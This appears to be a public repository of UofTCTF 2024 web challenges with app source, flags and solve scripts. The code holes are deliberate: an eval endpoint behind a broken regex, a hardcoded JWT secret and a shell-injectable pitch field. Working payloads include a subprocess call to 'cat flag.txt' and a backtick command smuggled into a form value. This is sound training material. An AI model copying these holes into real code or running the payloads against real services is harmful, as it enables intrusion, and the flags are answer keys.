| } 34 | 35 | button { 36 | width: 100%; 37 | padding: 10px; 38 | border: none; 39 | border-radius: 4px; 40 | background-color: #007bff; 41 | color: white; 42 | cursor: pointer; 43 | } 44 | 45 | button:hover { 46 | background-color: #0056b3; 47 | } 48 | 49 | .error { 50 | color: red; 51 | text-align: center; 52 | margin-bottom: 10px; 53 | } 54 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f9f9f9; 4 | margin: 0; 5 | padding: 0; 6 | } 7 | 8 | .container { 9 | max-width: 800px; 10 | margin: 20px auto; 11 | padding: 20px; 12 | background-color: #fff; 13 | border-radius: 8px; 14 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 15 | } 16 | 17 | h1 { 18 | color: #333; 19 | } 20 | 21 | nav ul { 22 | padding: 0; 23 | list-style-type: none; 24 | } 25 | 26 | nav ul li { 27 | display: inline; 28 | margin-right: 20px; 29 | } 30 | 31 | a { 32 | text-decoration: none; 33 | color: #007bff; 34 | } 35 | 36 | a:hover { 37 | text-decoration: underline; 38 | } 39 | 40 | .form-group { 41 | margin-bottom: 15px; 42 | } 43 | 44 | label { 45 | display: block; 46 | margin-bottom: 5px; 47 | } 48 | 49 | input[type="text"], 50 | input[type="password"] { 51 | width: 100%; 52 | padding: 10px; 53 | border: 1px solid #ddd; 54 | border-radius: 5px; 55 | box-sizing: border-box; 56 | } 57 | 58 | button { 59 | padding: 10px 20px; 60 | background-color: #007bff; 61 | color: white; 62 | border: none; 63 | border-radius: 5px; 64 | cursor: pointer; 65 | } 66 | 67 | button:hover { 68 | background-color: #0056b3; 69 | } 70 | 71 | .error, 72 | .warning { 73 | color: red; 74 | margin: 10px 0; 75 | } 76 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/profile.css: -------------------------------------------------------------------------------- 1 | .container { 2 | max-width: 600px; 3 | margin: 20px auto; 4 | padding: 20px; 5 | border: 1px solid #ccc; 6 | border-radius: 5px; 7 | background-color: #f9f9f9; 8 | } 9 | 10 | .form-group { 11 | margin-bottom: 15px; 12 | } 13 | 14 | .form-group label { 15 | display: block; 16 | margin-bottom: 5px; 17 | } 18 | 19 | .form-group input[type="text"], 20 | .form-group input[type="password"] { 21 | width: 100%; 22 | padding: 8px; 23 | border: 1px solid #ddd; 24 | border-radius: 4px; 25 | box-sizing: border-box; 26 | } 27 | 28 | button { 29 | padding: 10px 15px; 30 | color: white; 31 | background-color: #007bff; 32 | border: none; 33 | border-radius: 5px; 34 | cursor: pointer; 35 | } 36 | 37 | button:hover { 38 | background-color: #0056b3; 39 | } 40 | 41 | .message-box { 42 | padding: 10px; 43 | margin-bottom: 20px; 44 | border: 1px solid transparent; 45 | border-radius: 4px; 46 | text-align: center; 47 | } 48 | 49 | .message-box.success { 50 | color: #3c763d; 51 | background-color: #dff0d8; 52 | border-color: #d6e9c6; 53 | } 54 | 55 | .message-box.error { 56 | color: #a94442; 57 | background-color: #f2dede; 58 | border-color: #ebccd1; 59 | } 60 | 61 | .warning { 62 | color: #856404; 63 | background-color: #fff3cd; 64 | border-color: #ffeeba; 65 | padding: 0.75rem 1.25rem; 66 | margin-bottom: 1rem; 67 | border: 1px solid transparent; 68 | border-radius: 0.25rem; 69 | } 70 | 71 | nav { 72 | background: #007bff; 73 | color: white; 74 | padding: 10px; 75 | border-radius: 5px; 76 | margin-bottom: 20px; 77 | } 78 | 79 | nav ul { 80 | list-style: none; 81 | padding: 0; 82 | display: flex; 83 | } 84 | 85 | nav ul li { 86 | margin-right: 20px; 87 | } 88 | 89 | nav ul li a { 90 | color: white; 91 | text-decoration: none; 92 | } 93 | 94 | nav ul li a:hover { 95 | text-decoration: underline; 96 | } -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/register.css: -------------------------------------------------------------------------------- 1 | .container { 2 | width: 100%; 3 | max-width: 400px; 4 | margin: 50px auto; 5 | padding: 20px; 6 | background-color: #f9f9f9; 7 | border-radius: 8px; 8 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 9 | } 10 | 11 | h1 { 12 | text-align: center; 13 | color: #333; 14 | } 15 | 16 | .form-group { 17 | margin-bottom: 20px; 18 | } 19 | 20 | label { 21 | display: block; 22 | margin-bottom: 5px; 23 | color: #666; 24 | } 25 | 26 | input[type="text"], 27 | input[type="password"] { 28 | width: calc(100% - 22px); 29 | padding: 10px; 30 | border: 1px solid #ddd; 31 | border-radius: 4px; 32 | box-sizing: border-box; 33 | } 34 | 35 | button { 36 | width: 100%; 37 | padding: 10px; 38 | border: none; 39 | border-radius: 4px; 40 | background-color: #28a745; 41 | color: white; 42 | cursor: pointer; 43 | } 44 | 45 | button:hover { 46 | background-color: #218838; 47 | } 48 | 49 | .error { 50 | color: red; 51 | text-align: center; 52 | margin-bottom: 10px; 53 | } 54 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/js/login.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', function() { 2 | const loginForm = document.getElementById('loginForm'); 3 | const messageBox = document.getElementById('messageBox'); 4 | 5 | loginForm.addEventListener('submit', function(e) { 6 | e.preventDefault(); 7 | const data = { 8 | username: loginForm.username.value, 9 | password: loginForm.password.value 10 | }; 11 | 12 | fetch('/login', { 13 | method: 'POST', 14 | headers: { 'Content-Type': 'application/json' }, 15 | body: JSON.stringify(data) 16 | }).then(response => response.json()) 17 | .then(json => { 18 | showMessage(json.message, json.success ? 'success' : 'error'); 19 | if (json.success) { 20 | window.location.href = '/dashboard'; 21 | } 22 | }).catch(error => { 23 | showMessage('An error occurred. Please try again.', 'error'); 24 | }); 25 | }); 26 | 27 | function showMessage(message, type) { 28 | messageBox.textContent = message; 29 | messageBox.className = `message-box ${type}`; 30 | messageBox.style.display = 'block'; 31 | } 32 | }); 33 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/js/register.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', function() { 2 | const registerForm = document.getElementById('registerForm'); 3 | const messageBox = document.getElementById('messageBox'); 4 | 5 | registerForm.addEventListener('submit', function(e) { 6 | e.preventDefault(); 7 | const data = { 8 | username: registerForm.username.value, 9 | password: registerForm.password.value 10 | }; 11 | 12 | fetch('/register', { 13 | method: 'POST', 14 | headers: { 'Content-Type': 'application/json' }, 15 | body: JSON.stringify(data) 16 | }).then(response => response.json()) 17 | .then(json => { 18 | showMessage(json.message, json.success ? 'success' : 'error'); 19 | if (json.success) { 20 | window.location.href = '/login'; 21 | } 22 | }).catch(error => { 23 | showMessage('An error occurred. Please try again.', 'error'); 24 | }); 25 | }); 26 | 27 | function showMessage(message, type) { 28 | messageBox.textContent = message; 29 | messageBox.className = `message-box ${type}`; 30 | messageBox.style.display = 'block'; 31 | } 32 | }); 33 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/utils/config.js: -------------------------------------------------------------------------------- 1 | const crypto = require("crypto"); 2 | 3 | const JWT_SECRET = 4 | process.env.JWT_SECRET || crypto.randomBytes(64).toString("hex"); 5 | 6 | const FLAG = process.env.FLAG || "uoftctf{fake_flag}"; 7 | 8 | module.exports = { 9 | JWT_SECRET, 10 | FLAG, 11 | }; 12 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/dashboard.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Dashboard - Jay's Bank 5 | 6 | 7 | 8 |
9 | 16 |

Welcome, <%= username %>

17 |

Your phone number: <%= phone %>

18 |

Your credit card (last 4 digits): <%= credit_card.slice(-4) %>

19 | <% if (flag) { %> 20 |

Since you're the admin, here is your flag: <%= flag %>

21 | <% } %> 22 |
23 | 24 | 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/index.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Home - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Welcome to Jay's Bank

10 |

Welcome to my (work in progress) bank. Feel free to look around during our pre-alpha-alpha-alpha stage.

11 | 23 |
24 | 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/login.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Login - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Login

10 | 11 |
12 |
13 | 14 | 15 |
16 |
17 | 18 | 19 |
20 | 21 |
22 |

Don't have an account? Sign up here.

23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Register - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Register

10 | 11 |
12 |
13 | 14 | 15 | Username must be at least 10 characters long. 16 |
17 |
18 | 19 | 20 | Password must be at least 10 characters long and include at least one digit, one special character, one uppercase letter, and one lowercase letter. 21 | 22 |
23 | 24 |
25 |

Already have an account? Login here.

26 |
27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /Web/Jay's Bank/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{IiIiIiI_am_a_pro_JSON_injector_IiIiIiI} -------------------------------------------------------------------------------- /Web/My First App/README.md: -------------------------------------------------------------------------------- 1 | # My First App 2 | 3 | I'm not much of a web developer, so my friends advised me to pay for a very expensive firewall to keep my first app secure from pesky hackers. Come check it out! 4 | -------------------------------------------------------------------------------- /Web/My First App/solve/arg_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/arg_err.png -------------------------------------------------------------------------------- /Web/My First App/solve/ascii_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/ascii_err.png -------------------------------------------------------------------------------- /Web/My First App/solve/first_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/first_err.png -------------------------------------------------------------------------------- /Web/My First App/src/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ -------------------------------------------------------------------------------- /Web/My First App/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && apt-get install -y --no-install-recommends \ 4 | && rm -rf /var/lib/apt/lists/* 5 | 6 | RUN useradd -m ctfuser 7 | 8 | 9 | RUN chown -R root:root /home/ctfuser 10 | RUN chmod 755 /home/ctfuser 11 | RUN chmod 555 /tmp 12 | 13 | WORKDIR /home/ctfuser/app 14 | 15 | COPY --chown=root:root app.py requirements.txt routes.py utils.py ./ 16 | COPY --chown=root:root static ./static 17 | COPY --chown=root:root templates ./templates 18 | COPY --chown=root:root flag.txt . 19 | 20 | RUN pip install --no-cache-dir -r requirements.txt 21 | 22 | USER root 23 | RUN chmod -R 555 /home/ctfuser/app && \ 24 | chmod 444 /home/ctfuser/app/flag.txt 25 | 26 | USER ctfuser 27 | 28 | EXPOSE 1337 29 | 30 | CMD ["python", "app.py"] 31 | -------------------------------------------------------------------------------- /Web/My First App/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask 2 | from routes import web 3 | 4 | app = Flask(__name__, template_folder='templates') 5 | app.register_blueprint(web, url_prefix='/') 6 | 7 | 8 | if __name__ == '__main__': 9 | app.run(host="0.0.0.0", port=1337, debug=False) -------------------------------------------------------------------------------- /Web/My First App/src/flag.txt: -------------------------------------------------------------------------------- 1 | uoftctf{That_firewall_salesperson_scammed_me_:(} -------------------------------------------------------------------------------- /Web/My First App/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.0 2 | PyJWT==2.8.0 3 | -------------------------------------------------------------------------------- /Web/My First App/src/static/style.css: -------------------------------------------------------------------------------- 1 | body, html { 2 | margin: 0; 3 | padding: 0; 4 | height: 100%; 5 | background-color: #f4f4f4; 6 | font-family: 'Arial', sans-serif; 7 | color: #333; 8 | } 9 | 10 | .container { 11 | max-width: 1200px; 12 | margin: 0 auto; 13 | padding: 20px; 14 | display: flex; 15 | justify-content: center; 16 | align-items: center; 17 | min-height: 100vh; 18 | } 19 | 20 | .form-container { 21 | background-color: #ffffff; 22 | padding: 40px; 23 | border-radius: 8px; 24 | box-shadow: 0 2px 4px rgba(0,0,0,0.1); 25 | width: 100%; 26 | max-width: 400px; 27 | } 28 | 29 | input[type="text"], 30 | input[type="submit"] { 31 | width: 100%; 32 | padding: 10px; 33 | margin: 10px 0; 34 | border: 1px solid #ddd; 35 | border-radius: 4px; 36 | box-sizing: border-box; 37 | } 38 | 39 | input[type="submit"] { 40 | background-color: #5cb85c; 41 | color: white; 42 | border-color: #4cae4c; 43 | cursor: pointer; 44 | } 45 | 46 | input[type="submit"]:hover { 47 | background-color: #449d44; 48 | } 49 | 50 | .welcome-text { 51 | text-align: center; 52 | font-size: 24px; 53 | margin-bottom: 20px; 54 | } 55 | 56 | .error-message { 57 | color: #d9534f; 58 | background-color: #f2dede; 59 | border-color: #ebccd1; 60 | padding: 10px; 61 | margin-bottom: 20px; 62 | border-radius: 4px; 63 | text-align: center; 64 | } 65 | -------------------------------------------------------------------------------- /Web/My First App/src/templates/layout.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | {{ title | default("gg ez") }} 8 | 9 | 10 | 11 | 12 |
13 | {% block content %} 14 | {% endblock %} 15 |
16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Web/My First App/src/templates/register.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

Please choose a username

5 | {% if error %} 6 |
{{ error }}
7 | {% endif %} 8 |
9 | 10 | 11 |
12 |
13 | {% endblock %} 14 | -------------------------------------------------------------------------------- /Web/My First App/src/utils.py: -------------------------------------------------------------------------------- 1 | import jwt 2 | 3 | SECRET_KEY = 'torontobluejays' 4 | 5 | def create_jwt(username): 6 | return jwt.encode({'username': username}, SECRET_KEY, algorithm='HS256') 7 | 8 | def decode_jwt(token): 9 | try: 10 | return jwt.decode(token, SECRET_KEY, algorithms=['HS256']) 11 | except jwt.InvalidTokenError: 12 | return None 13 | -------------------------------------------------------------------------------- /Web/No Code/README.md: -------------------------------------------------------------------------------- 1 | # No Code 2 | 3 | I made a web app that lets you run any code you want. Just kidding! -------------------------------------------------------------------------------- /Web/No Code/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | base_url = "https://uoftctf-no-code.chals.io/" 4 | 5 | # Adding a newline to the beginning of the payload bypasses the check because the DOTALL regex flag wasn't used 6 | 7 | res = requests.post(f"{base_url}/execute", data={"code": "\nstr(__import__('subprocess').check_output('cat flag.txt',shell=True))"}, headers={"content-type": "application/x-www-form-urlencoded"}) 8 | print(res.text) -------------------------------------------------------------------------------- /Web/No Code/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && apt-get install -y --no-install-recommends \ 4 | && rm -rf /var/lib/apt/lists/* 5 | 6 | RUN useradd -m ctfuser 7 | 8 | 9 | RUN chown -R root:root /home/ctfuser 10 | RUN chmod 755 /home/ctfuser 11 | RUN chmod 555 /tmp 12 | 13 | WORKDIR /home/ctfuser/app 14 | 15 | COPY --chown=root:root app.py . 16 | COPY --chown=root:root requirements.txt . 17 | COPY --chown=root:root flag.txt . 18 | 19 | RUN pip install --no-cache-dir -r requirements.txt 20 | 21 | USER root 22 | RUN chmod -R 555 /home/ctfuser/app && \ 23 | chmod 444 /home/ctfuser/app/flag.txt 24 | 25 | USER ctfuser 26 | 27 | EXPOSE 1337 28 | 29 | CMD ["python", "app.py"] 30 | -------------------------------------------------------------------------------- /Web/No Code/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, jsonify 2 | import re 3 | 4 | app = Flask(__name__) 5 | 6 | @app.route('/execute', methods=['POST']) 7 | def execute_code(): 8 | code = request.form.get('code', '') 9 | if re.match(".*[\x20-\x7E]+.*", code): 10 | return jsonify({"output": "jk lmao no code"}), 403 11 | result = "" 12 | try: 13 | result = eval(code) 14 | except Exception as e: 15 | result = str(e) 16 | 17 | return jsonify({"output": result}), 200 18 | 19 | if __name__ == "__main__": 20 | app.run(host="0.0.0.0", port=1337, debug=False) 21 | -------------------------------------------------------------------------------- /Web/No Code/src/flag.txt: -------------------------------------------------------------------------------- 1 | uoftctf{r3g3x_3p1c_f41L_XDDD} -------------------------------------------------------------------------------- /Web/No Code/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.0 2 | -------------------------------------------------------------------------------- /Web/The Varsity/README.md: -------------------------------------------------------------------------------- 1 | # The Varsity 2 | 3 | Come read our newspaper! Be sure to subscribe if you want access to the entire catalogue, including the latest issue. -------------------------------------------------------------------------------- /Web/The Varsity/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim 2 | 3 | WORKDIR /usr/src/app 4 | 5 | ENV FLAG=uoftctf{w31rd_b3h4v10r_0f_parseInt()!} 6 | 7 | COPY package*.json ./ 8 | 9 | RUN npm install 10 | 11 | COPY . . 12 | 13 | EXPOSE 3000 14 | 15 | CMD [ "node", "server.js" ] 16 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "The Varsity", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "server.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "type": "module", 13 | "dependencies": { 14 | "cookie-parser": "^1.4.6", 15 | "ejs": "^3.1.9", 16 | "express": "^4.18.2", 17 | "jsonwebtoken": "^9.0.2" 18 | }, 19 | "devDependencies": { 20 | "nodemon": "^3.0.2" 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/css/index.css: -------------------------------------------------------------------------------- 1 | body, html { 2 | font-family: Arial, sans-serif; 3 | margin: 0; 4 | padding: 0; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | background-color: #f7f7f7; 10 | } 11 | 12 | .container { 13 | width: 80%; 14 | text-align: center; 15 | background-color: #fff; 16 | padding: 20px; 17 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 18 | margin-top: 50px; 19 | } 20 | 21 | h1 { 22 | color: #333; 23 | } 24 | 25 | #statusMessage { 26 | margin: 20px 0; 27 | color: #555; 28 | } 29 | 30 | #articleSelector { 31 | margin: 20px 0; 32 | } 33 | 34 | select { 35 | padding: 10px; 36 | margin-right: 10px; 37 | } 38 | 39 | button { 40 | padding: 10px 20px; 41 | background-color: #0056b3; 42 | color: white; 43 | border: none; 44 | cursor: pointer; 45 | } 46 | 47 | button:hover { 48 | background-color: #004494; 49 | } 50 | 51 | #articles { 52 | border: 1px solid #ddd; 53 | padding: 20px; 54 | margin-top: 20px; 55 | } 56 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/css/register.css: -------------------------------------------------------------------------------- 1 | body, html { 2 | font-family: Arial, sans-serif; 3 | margin: 0; 4 | padding: 0; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | background-color: #f7f7f7; 10 | } 11 | 12 | .container { 13 | display: flex; 14 | flex-direction: column; 15 | align-items: center; 16 | justify-content: center; 17 | width: 350px; 18 | border: 1px solid #ddd; 19 | padding: 20px; 20 | background-color: #fff; 21 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 22 | } 23 | 24 | h1 { 25 | text-align: center; 26 | margin-bottom: 20px; 27 | } 28 | 29 | .form-group { 30 | display: flex; 31 | flex-direction: column; 32 | align-items: flex-start; 33 | width: 100%; 34 | margin-bottom: 15px; 35 | } 36 | 37 | label, input[type=checkbox] { 38 | display: block; 39 | margin-bottom: 5px; 40 | } 41 | 42 | input[type=text], select, button { 43 | width: calc(100% - 20px); 44 | padding: 10px; 45 | border: 1px solid #ddd; 46 | margin-top: 5px; 47 | } 48 | 49 | .checkbox-group { 50 | display: flex; 51 | align-items: center; 52 | } 53 | 54 | button { 55 | width: 100%; 56 | padding: 10px; 57 | background-color: #0056b3; 58 | color: white; 59 | border: none; 60 | cursor: pointer; 61 | } 62 | 63 | button:hover { 64 | background-color: #004494; 65 | } 66 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/js/index.js: -------------------------------------------------------------------------------- 1 | function requestArticle() { 2 | const articleNum = document.getElementById("articleNum").value; 3 | const statusMessage = document.getElementById("statusMessage"); 4 | const articlesDiv = document.getElementById("articles"); 5 | 6 | fetch("/article", { 7 | method: "POST", 8 | credentials: "same-origin", 9 | headers: { 10 | "Content-Type": "application/json", 11 | }, 12 | body: JSON.stringify({ issue: articleNum }), 13 | }) 14 | .then((response) => { 15 | if (!response.ok) { 16 | return response.json().then((err) => { 17 | throw err; 18 | }); 19 | } 20 | return response.json(); 21 | }) 22 | .then((article) => { 23 | if (articlesDiv && statusMessage) { 24 | articlesDiv.innerHTML = `

${article.title}

${article.content}

`; 25 | statusMessage.textContent = "Enjoy reading!"; 26 | } 27 | }) 28 | .catch((error) => { 29 | if (statusMessage) { 30 | statusMessage.textContent = "Couldn't load article!"; 31 | 32 | articlesDiv.innerHTML = error.message || "Unknown error"; 33 | } 34 | console.error("Error:", error); 35 | }); 36 | } 37 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/js/register.js: -------------------------------------------------------------------------------- 1 | function toggleVoucher() { 2 | const voucherGroup = document.getElementById("voucherGroup"); 3 | voucherGroup.style.display = document.getElementById("hasVoucher").checked 4 | ? "block" 5 | : "none"; 6 | } 7 | 8 | document.getElementById("registrationForm").onsubmit = function (event) { 9 | event.preventDefault(); 10 | const username = document.getElementById("username").value; 11 | const voucher = document.getElementById("hasVoucher").checked 12 | ? document.getElementById("voucher").value 13 | : ""; 14 | 15 | fetch("/register", { 16 | method: "POST", 17 | headers: { 18 | "Content-Type": "application/json", 19 | }, 20 | body: JSON.stringify({ username, voucher }), 21 | }) 22 | .then((response) => response.json()) 23 | .then((data) => { 24 | if (data.message === "Invalid voucher") { 25 | document.getElementById("feedback").textContent = data.message; 26 | } else { 27 | document.cookie = `token=${data.token};path=/`; 28 | window.location.href = "/"; 29 | } 30 | }) 31 | .catch((error) => { 32 | console.error("Error:", error); 33 | }); 34 | }; 35 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Register for Access 7 | 8 | 9 | 10 |
11 |

Register for The Varsity

12 |
13 |
14 | 15 | 16 |
17 |
18 | 19 | 20 |
21 | 25 |

26 | 27 |
28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/views/user.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Welcome <%= username %>! 7 | 8 | 9 | 10 |
11 |

Greetings, <%= username %>!

12 | <% if (subscription === 'premium') { %> 13 |

As a premium member, you have exclusive access to all articles, including the latest insights and analyses. Enjoy your full access!

14 | <% } else { %> 15 |

You are currently exploring as a guest. Upgrade to premium to unlock our full library, including our most recent and in-depth articles.

16 | <% } %> 17 |
18 | 19 | 24 | 25 |
26 |
27 |
28 | 29 |
30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Web/The Varsity/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{w31rd_b3h4v10r_0f_parseInt()!} -------------------------------------------------------------------------------- /Web/The Varsity/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | base_url = "http://localhost:3000" 4 | s = requests.s() 5 | 6 | r = s.post( 7 | f"{base_url}/register", 8 | json={ 9 | "username": "idc", 10 | }, 11 | headers={"content-type": "application/json"}, 12 | ) 13 | 14 | r = s.post( 15 | f"{base_url}/article", 16 | json={"issue": 0.0000009}, # can also use something like "9abc" 17 | headers={"content-type": "application/json"}, 18 | ) 19 | 20 | print(r.text) 21 | -------------------------------------------------------------------------------- /Web/Voice Changer/README.md: -------------------------------------------------------------------------------- 1 | Name: Voice Changer 2 | Description: I made a cool app that changes your voice. Check it out at https://uoftctf-voice-changer.chals.io/. -------------------------------------------------------------------------------- /Web/Voice Changer/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:18-alpine 2 | RUN apk update 3 | RUN apk add su-exec 4 | RUN apk upgrade su-exec 5 | RUN apk add ffmpeg su-exec 6 | # Create app directory 7 | WORKDIR /app 8 | 9 | # Copy flag (secret.txt) 10 | COPY secret.txt / 11 | 12 | # Install app dependencies 13 | # A wildcard is used to ensure both package.json AND package-lock.json are copied 14 | # where available (npm@5+) 15 | COPY src/package*.json ./ 16 | 17 | RUN mkdir upload 18 | RUN mkdir output 19 | # If you are building your code for production 20 | RUN npm i --only=production 21 | # Bundle app source 22 | COPY src/ . 23 | 24 | RUN adduser -D myuser 25 | RUN chmod -R 755 . 26 | RUN chmod -R 777 ./upload 27 | RUN chmod a+s ./upload 28 | RUN chmod -R 777 ./output 29 | RUN chmod a+s ./output 30 | 31 | 32 | USER myuser 33 | 34 | EXPOSE 3030:3030 35 | CMD ["node", "index.js"] 36 | -------------------------------------------------------------------------------- /Web/Voice Changer/chal/secret.txt: -------------------------------------------------------------------------------- 1 | uoftctf{Y0UR Pitch IS 70O H!9H} -------------------------------------------------------------------------------- /Web/Voice Changer/chal/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "os_command_injection", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "node index.js", 9 | "dev": "nodemon index.js" 10 | }, 11 | "keywords": [], 12 | "author": "", 13 | "license": "ISC", 14 | "dependencies": { 15 | "connect-busboy": "^1.0.0", 16 | "express": "^4.18.2", 17 | "uuid": "^9.0.1" 18 | }, 19 | "devDependencies": { 20 | "nodemon": "^2.0.20" 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Web/Voice Changer/solve/README.md: -------------------------------------------------------------------------------- 1 | Issue a post request (using a software like postman) with any audio but setting the value of pitch to `` `cd ..;cd ..;cat secret.txt` ``, this will reveal the flag in the output.![img.png](img.png) 2 | This pitch value opens a subshell (using the \` syntax) which finds the flag. Note that to find the location of `secret.txt` you can inject commands like `ls`. -------------------------------------------------------------------------------- /Web/Voice Changer/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{Y0UR Pitch IS 70O H!9H} -------------------------------------------------------------------------------- /Web/Voice Changer/solve/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/Voice Changer/solve/img.png --------------------------------------------------------------------------------